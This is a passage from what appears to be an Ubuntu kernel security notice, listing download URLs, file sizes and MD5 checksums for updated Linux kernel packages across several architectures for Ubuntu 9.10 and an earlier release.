f7d8bdb504b89ed1f6f22cbb1c062a05\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    69286 1ae27dc724b0652b950ddd224e1462fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   119534 bff6e2026e420dcb65a0225d2bdc0596\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    12668 c8201f92c0f347dc67007a23fe7fa011\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   215256 f18473603a003ba28dd374ad628b484f\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    46660 914838556462e7f130e368b036f587bd\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    40958 2e3c304ba2a61195576580542c7df8a2\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    47308 0a3192cc6c009326bdb9b2727f64c3df\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    86528 95187d7fe20c439b657b61973e0d8fc9\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    33268 77f1ec039ca977ef40cd817c6e55dd69\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   523810 2d09a40e8d569a6af434ab0df4800442\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   125262 2e02a3dc4688efebfca2df638db10001\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    63568 d5cfcc03460e7127851f936b4d960947\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   300744 11cc3d85f263b85b6e3de8200c5afeed\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:  3036030 161110b4c0711adaa0a2ce65e4fa0179\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.60_lpia.deb\n      Size/MD5:   641934 39f7b1d539afcb8df6f0a9a288337bf7\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.60_lpia.deb\n      Size/MD5: 21801714 381e2a4a0ceb4dac21fc8536ca28c0ab\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.60_lpia.deb\n      Size/MD5:   766398 622dbeb693c3f3e032645cb4e7403654\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   303984 361d4a5d1abaffcc970e7a7753aafb99\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   157422 bf9415a68244682147d6cf69cff06c8c\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    24446 48e686eba8b48e51cd6f8add61e30783\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   260420 d75b101a53850ec30fd987cc98b5dcfc\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:  2027380 f7c86e961f136d8f7720606b07f42445\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   149404 a1ba79eddc8ec880b85f38acb9f4a169\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   184734 b9f553f43649b903d017b9ce996a477f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   143250 87d9254ed1fd059143b903615afcdf05\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    34468 fae089aae953a5d621edff3acc40b920\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:     5496 12aa2cd81eeb865d516ec72f965478dd\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    85656 4f0a903effc3fa9ee51940dee947d708\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    47412 1f2e8185757b3b615f667c9d68217e5a\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:     8712 fb99f53e2c6b83696b6b073fba605430\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    63110 26c63b035a2d9927c14df6f1f12ec8db\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    14720 20a7c8f7ebd43a137ea7b41a1630f139\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:  1447856 76bcfc8feb47f5ac5563af20bfc99c9e\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:    43894 d0889b8353438c679226440a3cd8adf0\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   155186 9c4ca527436faae3e26d5ddfc84483c7\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:   172668 de043f2370a2d9df8302df49630496ae\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb\n      Size/MD5:     8156 46a66e91cb7385b4b9b29dac39afc4a5\n\nUpdated packages for Ubuntu 9.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-305.13.diff.gz\n      Size/MD5:  9231427 c3f53b69a361314d42ce3d6e259f2503\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-305.13.dsc\n      Size/MD5:     2706 b4ee26ab32d83270e4e1360f3e17c9ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-109.25.diff.gz\n      Size/MD5:  3971656 b2857f67cd49a8cd59c3aeb7d94ac5a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-109.25.dsc\n      Size/MD5:     2180 3d2e087aeefb5fe483686bd47503d8a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-212.26.diff.gz\n      Size/MD5:  4575980 43940153bf9f4140ae4572da20a9e49d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-212.26.dsc\n      Size/MD5:     2214 3ce25d640b5d021c0b60d9a6f1cafb0c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-20.58.diff.gz\n      Size/MD5:  2931833 6676c1d226d154894c430a852bd5a7c9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-20.58.dsc\n      Size/MD5:     3782 027bb2d47b20e462a45edd918d0779ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-305.13_all.deb\n      Size/MD5:  3797952 6d464b3c3a1635718d9ccffd2a20d9e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-305.13_all.deb\n      Size/MD5: 64265774 835e6053c071fa1010b92d50b2762f91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-305_2.6.31-305.13_all.deb\n      Size/MD5:  9671634 2f6bb2d690e5d9522458ce136845e309\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-20.58_all.deb\n      Size/MD5:  3799562 2f43b06ccc01383a4f598751e6ba32a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20_2.6.31-20.58_all.deb\n      Size/MD5:  9539956 1d7d2889058126b51e55f0a3f2df5a94\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-20.58_all.deb\n      Size/MD5: 62184514 6dd23fd6f2f621bb95b434bf9e824fc6\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-305-ec2_2.6.31-305.13_amd64.deb\n      Size/MD5:   610244 0be9491b665967ea838131d028275da4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-305-ec2_2.6.31-305.13_amd64.deb\n      Size/MD5: 18763958 54754b35233eb07e6de3e6e44ecaa9a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   221432 da929164131e9c8177f81276b9e8b868\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    15642 407a7a2d9ba01bd8b4567963fd256c5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    52132 c961c35a3d22be161e13cdf8ba799c3b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    44832 ca1169011b27bacd52a727607f36fd73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    50076 fe9438cbcf59ac1d1b1d5365439e7e65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    92532 3ed5a38671b360e450c45b5ca5d82ee5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    37780 10299612add8025a896a2f72ec482798\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   537672 aaea4b446dba8c648fb65280c5747744\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   130672 564ea485b669f52e01a28e8bfd3077ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    53836 656705921e7c5ecbc184811b27091d99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   310120 df2680580c976ea667017d3323dd1c4d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:  4358002 032c5a17e6d9ed8175016f4694469047\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-generic_2.6.31-20.58_amd64.deb\n      Size/MD5:   705678 0e08b7ba77695ab12a62ce51c53c109f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-server_2.6.31-20.58_amd64.deb\n      Size/MD5:   705692 a0284e279b9295ffd3fd332f8c5b7b90\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-generic_2.6.31-20.58_amd64.deb\n      Size/MD5: 28943014 62622c3963d0609f5e6e75da7b0815e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-server_2.6.31-20.58_amd64.deb\n      Size/MD5: 28927152 d0a0459ba5d61e4cd417df8cea2839f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-virtual_2.6.31-20.58_amd64.deb\n      Size/MD5: 11758096 e0f0116714615ccc3a45b9264e7ae7df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_amd64.deb\n      Size/MD5:   750900 92e0faec1aec9665ce29b5a03bc4c081\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   168328 18687fd4e595c9af5df9fc35c2b2c518\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   202822 36c27a4070e79b5df8cecc7d9e8716c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    27272 8e8d278f596814c7e85bd298300b8afc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   311784 672ba00729b573715fcf26d1255e23de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:  2281866 9c74fd94f34894eb1522f1b7045cd7c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   158668 80a090db5e7c23f8c1afc043709d11d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   203104 78ab65be5039febd31bc4cc076006ef8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   161078 22b4849990ba0e78042ac54541b737e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    38058 5b0dcbe7a58a36e5c8e1dbc3aef5bf2a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:     5760 681bb2e661736ad96b96955243249b8e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    73754 4a0b69044bf9833cb0626b22cfdfc3c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    22254 f5386ea889491e31742064ff935fd6d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:     9546 9808c305081559c33e3d3a89e9ba5d42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    39840 ee84a0c45e323ed2ef5bbddd0c240fe6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    23488 e5ddd285190726239473e769b9878a9f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:  1389892 f7dda1ecf1454c252f6fd1a22ea6e685\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    47374 e34e6784362b33d76d2d4b9f8cd4bd39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    51768 ae84bf131e8fd4b11de8d56226e2523d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:   128950 e7a5b9992b8d56b74df4149b1d05fd3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb\n      Size/MD5:    15818 b4afab0bdffeed60838883ba62e6066e\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-305-ec2_2.6.31-305.13_i386.deb\n      Size/MD5:   582086 cb7103f59ecbe0dc75e98601a4c0b857\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-305-ec2_2.6.31-305.13_i386.deb\n      Size/MD5: 18093924 4fcb203070eb6e763db461b31b511647\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   198842 561707c22b421f12db802634fa86ec9b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    32454 45c00927e6a03d992744f8ac02aa0306\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    49946 d33ba1957c29206bfb679b0bf5082503\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    42114 3e44960aed5c448f9f20b991c38092dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    45952 7298cdb31907bad7ded10be8cb7982ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    87402 6977db4b4114ec1305f9f7bce4156b46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    33760 09902fef35eefce504b05c8be8c962f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   534180 6707f8ddb7878d95f5926c02bd78429b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   128182 babc248d4b5cf798b57fd1748810a7b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    49744 6971b858c415c7675fa1819bfa4ba9b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   295740 7b51f82d9cc20815f797d19506744fe9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:  4194312 f636a76779d4e290a5c0468bfbad04f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-386_2.6.31-20.58_i386.deb\n      Size/MD5:   683228 ec8278d4fa8ad4c0fc6fcb364a630ff6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-generic-pae_2.6.31-20.58_i386.deb\n      Size/MD5:   683102 24fcc52654096b221b63853997baae4b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-generic_2.6.31-20.58_i386.deb\n      Size/MD5:   683258 6ef673ac513a9fa35e9f29b19d904abf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-386_2.6.31-20.58_i386.deb\n      Size/MD5: 28811012 a3a8220dd02dc09344a80bd264bdfdbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-generic-pae_2.6.31-20.58_i386.deb\n      Size/MD5: 28960774 b3bd2524cb864477810e365bd5c6663b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-generic_2.6.31-20.58_i386.deb\n      Size/MD5: 28880888 9c66246e653c349067d7270392eb2568\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-virtual_2.6.31-20.58_i386.deb\n      Size/MD5: 11212724 fa51426c0a4db11d89c25be4913bc2cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_i386.deb\n      Size/MD5:   750866 ab3b0f2871d8969fca839afc31062102\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   172872 a8966308b80b55fb305ccc1e51667352\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   186156 56c280240175e5a72523c2bd2cd6cbf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    28374 4eda4b1a9590843c5a0d556b27d34223\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   292858 f107aa4800660884111ea7c39aaf9419\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:  2400144 a914e510233245cdecc4b5f77a76cd17\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   142002 0d8f962212f59d469cdcf69d730328d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   189586 05567c3f78cb3b5a5628c20d4def6bd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   148520 573d3cfa067b88bd90d56f69d1682dfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    35304 8f18f18e5a8ffc1e3c16f1d4c5e1d9d8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:     6848 54f3defcaa0dd0210c55899b86f85ba0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    86056 cbf61386af6d9ff47dd05cc81a0fc3f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    46426 6ed59fbbae6ed3cffc99d9ceba80e7e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:     8918 498d386c2cebbc12b692e0d6faceadbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    36284 e69ff47ad64d5ef819013d9fe3a8dcdb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    21666 b9f565853aab6fc46bc21a2de0b2efb6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:  1495312 e7f74aa6ccfef64856c690d5dce9abf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    44080 7e7ccb5c93056f73cf86b3f7e456280a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    48552 5b90bbea6168164ec28a7be85babd9f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:   117816 0c65bbcfa932c88d2c273f57576a1f60\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb\n      Size/MD5:    14532 13c86e9feca3c0b9aa25fa2ed12255be\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   198818 f492a89bfa133a816f5433b30d3f7126\n    http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    32450 c49b64363f35bf007621ebce919f45da\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    49926 42aa3c895b556b7664a9bace4e5c07ce\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    42156 52a740685ed3fe88458e4869e1a1436c\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    45948 63f114893966030fb2dd21fb1ff86e57\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    87384 ed5770c1e95984aed677bade283e574b\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    33754 a1acff2d5ffc0d8e572338b59e1d2267\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   534380 e07265b8c2eb60074d61ec0f8f866564\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   128214 4d6b45a7d7399608315d622c29c4fbfb\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    49742 a1727d6371570e668ce8d049ded41fc5\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   295736 